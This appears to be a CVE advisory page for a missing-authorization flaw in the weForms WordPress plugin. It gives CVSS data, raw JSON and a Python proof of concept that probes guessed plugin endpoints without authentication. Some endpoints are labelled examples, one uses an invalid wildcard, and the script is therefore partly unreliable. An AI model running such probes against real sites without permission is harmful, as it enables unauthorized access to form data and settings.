Security Vulnerability Report
中文
CVE-2025-69028 CVSS 5.3 MEDIUM

CVE-2025-69028

Published: 2025-12-30 11:16:01
Last Modified: 2026-04-15 00:35:42

Description

Missing Authorization vulnerability in BoldGrid weForms weforms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects weForms: from n/a through <= 1.6.25.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

BoldGrid weForms <= 1.6.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # CVE-2025-69028 PoC - Missing Authorization in BoldGrid weForms # Target: WordPress site with weForms plugin <= 1.6.25 target_url = "http://target-wordpress-site.com" # List of potential vulnerable endpoints (examples) vulnerable_endpoints = [ "/wp-json/weforms/v1/forms", "/wp-json/weforms/v1/entries", "/wp-admin/admin-ajax.php?action=weforms_*", "/wp-json/weforms/v1/settings", "/wp-json/weforms/v1/export" ] headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", "Content-Type": "application/json" } print("Testing CVE-2025-69028 - BoldGrid weForms Missing Authorization") print("=" * 60) for endpoint in vulnerable_endpoints: url = target_url + endpoint try: # Attempt to access without authentication response = requests.get(url, headers=headers, timeout=10) print(f"\n[TESTING] {url}") print(f"Status Code: {response.status_code}") if response.status_code == 200: print("[!] VULNERABLE - Endpoint accessible without authorization") print(f"Response preview: {response.text[:200]}...") elif response.status_code == 401 or response.status_code == 403: print("[OK] Protected endpoint") else: print(f"[*] Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[ERROR] {endpoint}: {str(e)}") print("\n" + "=" * 60) print("Scan complete. Update weForms to version 1.6.26 or later.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-69028", "sourceIdentifier": "[email protected]", "published": "2025-12-30T11:16:01.353", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in BoldGrid weForms weforms allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects weForms: from n/a through <= 1.6.25."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/weforms/vulnerability/wordpress-weforms-plugin-1-6-25-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}